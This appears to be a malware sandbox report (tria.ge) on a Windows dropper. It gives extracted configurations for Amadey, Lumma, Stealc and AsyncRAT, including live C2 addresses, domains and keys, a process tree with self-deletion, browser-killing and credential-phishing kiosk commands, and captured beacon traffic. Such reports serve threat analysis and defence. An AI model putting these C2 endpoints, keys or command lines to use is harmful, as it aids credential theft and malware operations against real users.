Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/12/2024, 19:47 UTC

General

  • Target

    1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe

  • Size

    6.9MB

  • MD5

    5690ba1d0f23125e6a250ad945bb0f61

  • SHA1

    735ea7ae82ffcfa15cb8de133a2cd29ffb2f294e

  • SHA256

    1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636

  • SHA512

    6262d48e3ea0c5e1ca0f91b5950749ccddc36a53b82a12d1443f6d3b84e6e0b4164d347a5a9bfe2f0796d9f733e38cb4de1acb79da362f72d9dcef682d5bfd46

  • SSDEEP

    196608:Gamkq+z5p/OtyEeJiwXW65oY3GEmR7+2cVau:bmkqc9O/6fW6aY3GfR7+dQu

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

205.209.109.10:4449

205.209.109.10:7723

Mutex

clgbfqzkkypxjps

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
JrMOaJuxfZSKWpOLEGsB7P6ZlsENcx9t

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Async RAT payload 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe
    "C:\Users\Admin\AppData\Local\Temp\1136566f5c896c8a2218126b2c4dbe67a6fd83bf808fd2de735458a6422f0636.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5048
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g1t41.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\g1t41.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\j7v75.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\j7v75.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1c55e6.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1c55e6.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:5016
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3192
            • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe
              "C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1904
            • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
              "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:4944
            • C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe
              "C:\Users\Admin\AppData\Local\Temp\1013765001\yiklfON.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2508
            • C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe
              "C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4932
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1013771001\3EUEYgl.exe" & rd /s /q "C:\ProgramData\K6PZCBASJEKF" & exit
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:652
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 10
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:1460
            • C:\Users\Admin\AppData\Local\Temp\1013794001\f47698ce5b.exe
              "C:\Users\Admin\AppData\Local\Temp\1013794001\f47698ce5b.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4192
            • C:\Users\Admin\AppData\Local\Temp\1013795001\f3745b045c.exe
              "C:\Users\Admin\AppData\Local\Temp\1013795001\f3745b045c.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4348
            • C:\Users\Admin\AppData\Local\Temp\1013796001\0858ba6bc7.exe
              "C:\Users\Admin\AppData\Local\Temp\1013796001\0858ba6bc7.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3168
            • C:\Users\Admin\AppData\Local\Temp\1013797001\a0897fb31f.exe
              "C:\Users\Admin\AppData\Local\Temp\1013797001\a0897fb31f.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:4836
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4772
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1592
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4924
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4620
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3112
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:3416
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:3524
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02d52b29-747a-4ce7-bb5f-e416e8ddc916} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" gpu
                      9⤵
                        PID:4624
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2472 -prefMapHandle 2460 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {baba7b08-c019-4c12-ba76-e5b3a7bc7b35} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" socket
                        9⤵
                          PID:3992
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2772 -childID 1 -isForBrowser -prefsHandle 3224 -prefMapHandle 2968 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6b6c773-fec5-46fb-bba4-66b3573bf358} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                          9⤵
                            PID:1484
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3940 -childID 2 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b83ef54b-e711-400f-8d5d-51d4e4a94eb3} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                            9⤵
                              PID:1768
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4476 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4564 -prefMapHandle 4560 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91d8f691-c1fe-4f74-8341-77f11ffedd68} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" utility
                              9⤵
                              • Checks processor information in registry
                              PID:6500
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 3 -isForBrowser -prefsHandle 5208 -prefMapHandle 5200 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {508ed6b7-1ada-4a5c-bed5-b1d75b888bd6} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                              9⤵
                                PID:7000
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 4 -isForBrowser -prefsHandle 5352 -prefMapHandle 5356 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e1aaec9-91b2-4eab-88be-c9e847a9e2e3} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                                9⤵
                                  PID:7092
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5624 -childID 5 -isForBrowser -prefsHandle 5544 -prefMapHandle 5548 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {784a43c1-049e-47c6-85fc-1e24d1569e33} 3524 "\\.\pipe\gecko-crash-server-pipe.3524" tab
                                  9⤵
                                    PID:7104
                        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2g5323.exe
                          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2g5323.exe
                          4⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1384
                      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d69R.exe
                        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d69R.exe
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2720
                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4L684S.exe
                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4L684S.exe
                      2⤵
                      • Modifies Windows Defender Real-time Protection settings
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Windows security modification
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3360
                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                    1⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3288
                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                    1⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2900

                  Network

                  • flag-us
                    DNS
                    8.8.8.8.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    8.8.8.8.in-addr.arpa
                    IN PTR
                    Response
                    8.8.8.8.in-addr.arpa
                    IN PTR
                    dnsgoogle
                  • flag-us
                    DNS
                    58.55.71.13.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    58.55.71.13.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    90.210.23.2.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    90.210.23.2.in-addr.arpa
                    IN PTR
                    Response
                    90.210.23.2.in-addr.arpa
                    IN PTR
                    a2-23-210-90deploystaticakamaitechnologiescom
                  • flag-us
                    DNS
                    atten-supporse.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    atten-supporse.biz
                    IN A
                    Response
                    atten-supporse.biz
                    IN A
                    104.21.96.1
                    atten-supporse.biz
                    IN A
                    104.21.16.1
                    atten-supporse.biz
                    IN A
                    104.21.64.1
                    atten-supporse.biz
                    IN A
                    104.21.112.1
                    atten-supporse.biz
                    IN A
                    104.21.48.1
                    atten-supporse.biz
                    IN A
                    104.21.80.1
                    atten-supporse.biz
                    IN A
                    104.21.32.1
                  • flag-us
                    POST
                    https://atten-supporse.biz/api
                    2g5323.exe
                    Remote address:
                    104.21.96.1:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: atten-supporse.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=p3prmk69gnhourrf473igrlq19; expires=Sat, 05-Apr-2025 13:34:01 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJWMCU1OJlDXMIjn%2B7Wyot8xfnZNa5GgzamayBySplnGUhHpFMzMWs8SP0%2FDf%2FCLR39ggt76Zoz7pGZzoh1x53lvm1T5gxTBRLBaaDJ0THwX0Yp7t61SGj5BLVj%2FGmXLQZHh7Ng%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effbf0e5ecb7708-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=61534&min_rtt=60535&rtt_var=24700&sent=9&recv=9&lost=0&retrans=3&sent_bytes=6352&recv_bytes=609&delivery_rate=19800&cwnd=250&unsent_bytes=0&cid=92ea845424aacb63&ts=743&x=0"
                  • flag-us
                    DNS
                    138.32.126.40.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    138.32.126.40.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    95.221.229.192.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    95.221.229.192.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    1.96.21.104.in-addr.arpa
                    Remote address:
                    8.8.8.8:53
                    Request
                    1.96.21.104.in-addr.arpa
                    IN PTR
                    Response
                  • flag-us
                    DNS
                    se-blurry.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    zinc-sneark.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    zinc-sneark.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    dwell-exclaim.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    dwell-exclaim.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    formy-spill.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    formy-spill.biz
                    IN A
                    Response
                  • flag-us
                    DNS
                    covery-mover.biz
                    f3745b045c.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    covery-mover.biz
                    IN A
                    Response
                    covery-mover.biz
                    IN A
                    172.67.206.64
                    covery-mover.biz
                    IN A
                    104.21.58.186
                  • flag-us
                    POST
                    https://covery-mover.biz/api
                    2g5323.exe
                    Remote address:
                    172.67.206.64:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: covery-mover.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Tue, 10 Dec 2024 19:47:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=cp998734365gjeifb4citnmg2e; expires=Sat, 05-Apr-2025 13:34:01 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2Bz5mueI0688qRsfa5HiKGOcr5Cr9bTApfVoU2%2FOZWpMLilRvafLgmwfdnfjeQfzDOHMPcVjQT%2FzqC6B%2B%2B3d%2BjqbTJQxa31xoAWXkP7RkLLVsTzwYN0aAvt8fvfnnPzi9u6E"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8effbf12b9dbcd2a-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=60930&min_rtt=50434&rtt_var=16965&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=73823&cwnd=253&unsent_bytes=0&cid=f753dddbaae7542a&ts=261&x=0"
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 4
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 158
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:47:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:48:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:48:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Tue, 10 Dec 2024 19:49:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
